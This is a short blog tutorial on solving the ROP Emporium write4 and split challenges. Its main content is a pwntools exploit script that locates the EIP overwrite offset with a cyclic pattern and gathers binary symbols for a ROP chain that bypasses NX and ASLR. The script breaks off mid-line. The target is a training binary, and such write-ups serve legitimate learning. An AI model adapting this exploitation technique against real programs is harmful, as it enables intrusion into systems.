Posts

Showing posts from January, 2018

[ROPEmporium]: Bypassing ASLR and NX

Hi, in this tutorial I'll share how I did the write4 and split challenges from ROP Emporium, bypassing NX (non-executable stack) and ASLR (Address Space Layout Randomization). This script works fine for both examples.

from pwn import *
#context.log_level = "debug" #Enable it to run pwntools in debug mode
e = ELF("./write432") #Open the binary.
p = process(e.path) #Create a new process.
p.sendline(cyclic(400)) #Send a 400-byte cyclic pattern to find where the overflow lands.
p.wait()
core = p.corefile #Create a core file from the crash with EIP overwritten.
eip_offset = cyclic_find(core.eip) #Find the correct EIP offset.
print ""
info("Found eip Offset %d", eip_offset)
print ""
p = process(e.path)
p.recv()
#Searching symbols in the binary
printf = e.symbols["printf"]
main = e.symbols["main"]
stdin = e.symbols["stdin"]
fgets = e.symbols["fgets"]
buffer_mem = 0x0804a028 #buffer_mem is address of .data o